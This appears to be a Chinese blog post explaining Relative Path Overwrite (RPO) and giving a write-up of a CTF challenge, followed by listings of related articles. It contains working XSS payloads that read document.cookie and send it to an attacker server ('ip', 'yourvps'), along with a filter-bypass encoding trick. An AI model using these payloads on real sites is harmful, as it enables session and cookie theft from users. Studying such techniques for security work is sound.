RPO漏洞

最新推荐文章于 2024-05-09 05:41:26 发布
最新推荐文章于 2024-05-09 05:41:26 发布
阅读量913 收藏 1
点赞数
文章标签: 运维 php python
原文链接:https://yq.aliyun.com/articles/654398
版权

参考文献:
http://120.77.209.122/index.php/archives/24/
https://www.jianshu.com/p/340bd5353248

RPO漏洞就是服务端和客户端对这个URL的解析不一致导致的,当页面中调用的静态文件是以相对路径调用的时候,我们可以利用浏览器错误的解析页面的路径从而去错误的引导静态文件(CSS)文件加载

在apche上..%2f不能解析,只有在nginx上才能实现。条件这么苛刻,都不知道用处多大。。

http://www.cnblogs.com/p00mj/p/6755000.html:这个大佬的入门还是挺好的,可以看看这个,apache上也可以复现,代码就不贴了。有传参存在的时候,在这里浏览器误以为我们参数的键/country/是一个实际的路径,从而导致实际加载的css文件路径就成了
http://localhost/hello/url.php/country/style.css,在这里服务端收到的请求会认为请求/country/style.css是一个键为country值为style.css的参数,从而返回页面。

发现RPO后利用修改了网页的路径,使页面css加载路径成为了可以加载任意的google域名下的任意样式表,然后在样式表中找到一个可以使用参数导入背景的网页,向里面插入攻击参数,传入了一个简单的css样式。使用被攻击页面url进行引用,页面的css样式改变攻击代码在能成功执行。

实在是不想搭个nginx的环境了,将强网杯 share your mind 复现下好了

在源码中,其中一个调用js的时候没有/,存在rpo漏洞。

img_dfe19f857dbc065fa5c00df22a5ecc5f.png
1.png
img_34c00b172d7e669a50600d12d874e1ff.png
1.png
img_5b16add8cab43aa23328d90dcd404d67.png
2.png

payload:
http://39.107.33.96:20000/index.php/view/article/2664/..%2f..%2f..%2f..%2findex.php
(%2f是/的url编码,服务器能解析,但是浏览器不能解析)
其中,写文章的地方是我们可控的,写入我们想测试的xss语句,标题不要写,内容为alert(1),然后引用payload发现弹框了。

查看当前js的引用路径http://39.107.33.96:20000/index.php/view/article/2664/static/js/jquery.min.js
我们正常访问这个路径时发现内容和我们访问http://39.107.33.96:20000/index.php/view/article/2664的内容是一样的
这就说明,网页按照这个路径把2664的内容当做了js文件进行了请求,并且还当做js代码执行了,而后面的js的路径被当做了参数忽略了。

构建攻击payload

b=document.cookie;a='<img src=http://ip/'+btoa(b)+'>';  document.write(a);
ip为自己的服务器ip,在服务器上查看日志文件

因为攻击代码的引用时会过滤了单引号和双引号,所以要对payload进行实体化编码,用String.fromCharCode()函数引用
print map(ord ,"payload") //将payload放入进行实体化编码,python真的强
eval(String.fromCharCode()) //将实体化编码的payload放入
然后将http://39.107.33.96:20000/index.php/view/article/2578/..%2f..%2f..%2f..%2findex.php提交到Reports

img_9719081624366608bee7449acea38318.png
1.png

将GET后的内容base64解码,得到HINT=Try to get the cookie of path "/QWB_fl4g/QWB/"
提交的时候还需爆破substr((md5($code),0,6) ,贴下代码 

# !/usr/bin/env python
import hashlib
def md5(s):
    return hashlib.md5(s).hexdigest()
for i in range(1, 99999999):
    if md5(str(i)).startswith('cd5664'):
        print i
        break

将里面的内容写成题目上给的就行

然后继续

var i = document.createElement("iframe");i.setAttribute("src", "/QWB_fl4g/QWB/");
document.body.appendChild(i);i.addEventListener( "load", function(){ var content = i.contentWindow.document.cookie; location='//yourvps/'+btoa(content);}, false);

跟上面一样,就不贴了。。

weixin_33768481
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
RPO漏洞学习
weixin_30347335的博客
08-28 423
Internet Explorer存在URL问题 处理URL很容易搞砸。有时,应用程序的URL验证中的轻微不准确可能会导致轻微问题,或者如果浏览器混淆了漏洞则会导致漏洞。这次,将介绍与Internet Explorer有问题的URL重定向相关的两个错误,帖子的后半部分将介绍一种有趣的RPO开发技术 GitHub OAuth Code Theft URL编码或百分号编码通常用于查询字符串或请求正文中...
理解 RPO 攻击
weixin_30482383的博客
07-23 382
原理 RPO攻击又名为相对路径覆盖攻击。主要被利用于xss攻击之中。简单的理解该攻击原理,假设现在有2个目录分别为aaa目录和bbb目录,利用浏览器与服务器对特殊构造的url的解析差异,让获取了aaa目录下的文件的浏览器误以为自己在bbb目录。当aaa下的文件出现了相对路径的文件引用的时候,浏览器会去读取bbb目录下的该文件,从而造成了漏洞的产生。比如,当在aaa目录下读取的html代...
最新nginx网站安全漏洞修复(1),2024百度网络安全岗面试真题收录解析
最新发布
2401_84297193的博客
05-09 712
3⃣️ 检验是否添加成功,在网站中再次访问查看是否含有该响应头,若没有,则清除浏览器缓存再次访问。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。–如果没有配置,则检查响应内容,若响应内容是没有DOCTYPE声明的HTML,且存在相对路径引用的css、js资源,则认为存在该漏洞。这个是由于代码之前引入的css和js有相对路径引起的,虽然前端已经注释掉了,但是还是检测出来了。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!,大家跟着这个大的方向学习准没问题。
相对路径覆盖漏洞攻击RPO详解
Cwillchris的博客
09-26 3985
此攻击方法依赖于浏览器和服务器的反应,基于服务器的Web缓存技术和配置差异,以及服务器和客户端浏览器的解析差异,利用前端代码中加载的css/js的相对路径来加载其他文件,最终浏览器将服务器返回的不是css/js的文件当做css/js来解析,从而导致XSS,信息泄露等漏洞产生。这就是相对路径覆盖攻击, 我们成功用/aaa目录下的b.js覆盖掉了a.html中静态资源b.js的路径.如果我们控制网站根目录下的aaa的目录下面的b.js的内容,写入/aaa/b.js内容如下。输入如下代码,保存退出。
一篇RPO漏洞挖掘文章翻译加深理解。
weixin_30455365的博客
09-16 753
    这是我第一次尝试翻译一篇漏洞挖掘文章,翻译它也是为了加深理解它。这是一篇很有意思的漏洞挖掘文章。   前几天在看fd的博客,偶然看到了这篇文章,虽然有点老了。但是思路真的牛皮。我决定花费时间和精力研究它们。我决定运用我对这个漏洞的理解来讲述他们。   存在漏洞网站地址:http://www.google.com/tools/toolbar/buttons/apis/howto...
信息服务上线渗透检测网络安全检查报告和解决方案3(系统漏洞扫描、相对路径覆盖RPO漏洞、nginx漏洞修复)
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
03-03 1033
经过对该部门应用系统漏洞扫描工作开展,发现高风险漏洞0项,中风险漏洞1项,低风险漏洞11项。业务部门对于中高风险漏洞按照专业安全测评公司建议及时修改,修改后我们及时开展二次漏洞扫描工作。确保应用系统漏洞控制在安全法规要求之内,确保信息与数据安全。@漏刻有时。
Android中zip解压漏洞分析
08-04
例如,某些库在处理相对路径溢出(Relative Path Overwrite, RPO)或绝对路径溢出(Absolute Path Overwrite, APO)时可能出现问题。 相对路径溢出漏洞通常发生在解压过程中,当zip文件内的条目具有相对于zip文件...
错误赏金参考:受https:github.comdjadminawesome-bug-bounty启发,按错误性质分类的错误赏金记录列表
02-26
假设您在网站上找到了一个RPO(相对路径覆盖),但是您不知道如何利用它,那么理想的选择就在。 或者您已经发现您的客户正在使用oauth机制,但是您不知道我们应该如何测试它,另一个理想的选择就是在 我的目的是...
高级java笔试题-Web-Security-Learning:网络安全学习https://chybeta.github.io/2017/08
06-03
RPO(relative path overwrite) Web Cache redis 。 PHP相关 弱类型 随机数问题 伪协议 序列化 php mail header injection 其他 php代码审计 java-Web 反序列 Struct2 java-Web代码审计 其他 python-Web Node-js WAF...
运维方案1.0v.docx
04-29
- **RTO&RPO设计**:根据业务系统的实际架构,评估并设计RTO(恢复时间目标)和RPO(恢复点目标),避免单点故障,确保快速恢复。 **2. 日常运维计划** 2.1. 阶段巡检报告(每季度一次) - 提供季度性的主机、网络...
chaos-data:混乱的摘录
03-10
6. **恢复时间目标(RTO)和恢复点目标(RPO)**:混沌实验可以帮助定义和优化RTO(系统从故障中恢复所需的时间)和RPO(系统可以接受的最大数据丢失量)。这些指标是衡量业务连续性和灾难恢复计划的重要标准。 7. **...
Bug Bounty Hunting for Web Security.pdf
12-11
Bug Bounty Hunting for Web Security Bug Bounty Hunting for Web Security Bug Bounty Hunting for Web Security Bug Bounty Hunting for Web Security
RPO漏洞分析与利用
vspiders的博客
04-04 2830
RPO,全称(Relative Path Overwirte)相对路径覆盖,它主要利用浏览器的一些特性与服务器的配置差异导致的。通俗来说就是浏览器与服务器两者对请求的解析不一致,并没有做到同步解析。因而我们可以通过相对路径来引入其他的资源文件,以至于达到我们的目的。这里以www.xxx.com/test为例。第一步:比如我们输入一个请求http://www.xxx.com/test/%2f..%2...
nginx网站安全漏洞修复
unhejing的博客
07-27 9993
前言:公司项目交付之前甲方进行了安全漏洞的扫描。大部分漏洞都是因为nginx响应没有加上仿攻击的响应头。记录一下漏洞以及解决方法 1.检测到目标URL存在相对路径覆盖(RPO)漏洞漏洞是因为一下原因: --访问当前URL,检测响应头是否配置了x-content-type-options头; --如果没有配置,则检查响应内容,若响应内容是没有DOCTYPE声明的HTML,且存在相对路径引用的css、js资源,则认为存在该漏洞。 解决方法: 1⃣️ 去掉响应内容里面的相对路径。这个是由于代码之前引
RPO技巧拓展】————3、IIS和.Net应用程序中的非根相对路径覆盖(RPO
Fly_鹏程万里
01-31 2572
在这篇博文中,我将向您展示一种更好的方法来利用ASP.NET Web窗体应用程序中的非根相对路径覆盖问题。这是一个低风险漏洞,可用于将资源(如样式表)甚至动态JavaScript注入受影响的网页。 介绍 很长一段时间以来,我们很多人都知道路径信息以及.Net,php或java等几种Web应用技术的能力,这些技术可以通过使用斜杠(“/”)或半波段在文件扩展名后接受参数-colon(“;”)字符。...
RPO技巧拓展】————2、Detecting and exploiting path-relative stylesheet import (PRSSI) vulnerabilities
Fly_鹏程万里
01-31 2046
去年年初,Gareth Heyes推出了一种引人入胜的新技术,通过利用路径相对样式表导入来攻击Web应用程序,并将其称为“ 相对路径覆盖 ”。此攻击通过滥用许多常见Web语言和框架的路径处理功能,欺骗浏览器将HTML页面导入为样式表。由于极其宽容的样式表解析,这可以经常用于注入恶意CSS和劫持用户帐户。 这种技术目前非常深奥,因此对于已经接受过专业或众包审计的网站来说,它通常很有效。然而,在...
RPO学习
qq_36495104的博客
07-01 658
来源 https://www.freebuf.com/articles/web/166731.html http://blog.nsfocus.net/rpo-attack/ 0X1 什么是RPO RPO(Relative Path Overwrite)相对路径覆盖,是一种新型攻击技术,主要是利用浏览器的一些特性和部分服务端的配置差异导致的漏洞,通过一些技巧,我们可以通过相对路径来引入其他的资源文件,以至于达成我们想要的目的 就目前来看此攻击方法依赖于浏览器和网络服务器的反应,基于服务器的Web缓存技
分享一下修复项目漏洞步骤
IT_master8888的博客
02-06 3182
项目漏洞修复步骤: Apache Shiro RememberMe 1.2.4 反序列化过程命令执行漏洞 <shiro.version>1.6.0</shiro.version> 检测到目标站点存在javascript框架库漏洞 jquery-3.5.1.js 检测到目标主机可能存在缓慢的HTTP拒绝服务攻击 设置Tomcat / server.xml文件 connectiontimeout 值,默认为20000ms,修改为8000ms(Tomcat 自身安全漏洞) A...
rto,rpo 怎么设置合理
06-11
RTO(重传超时时间)和 RPO(恢复点目标)都是网络通信中的重要参数。 RTO 的设置需要考虑以下因素: 1. 网络延迟:RTO 的值应该大于网络延迟时间,否则可能会导致发送方在等待 ACK 时过早地重传数据包。 2. 网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值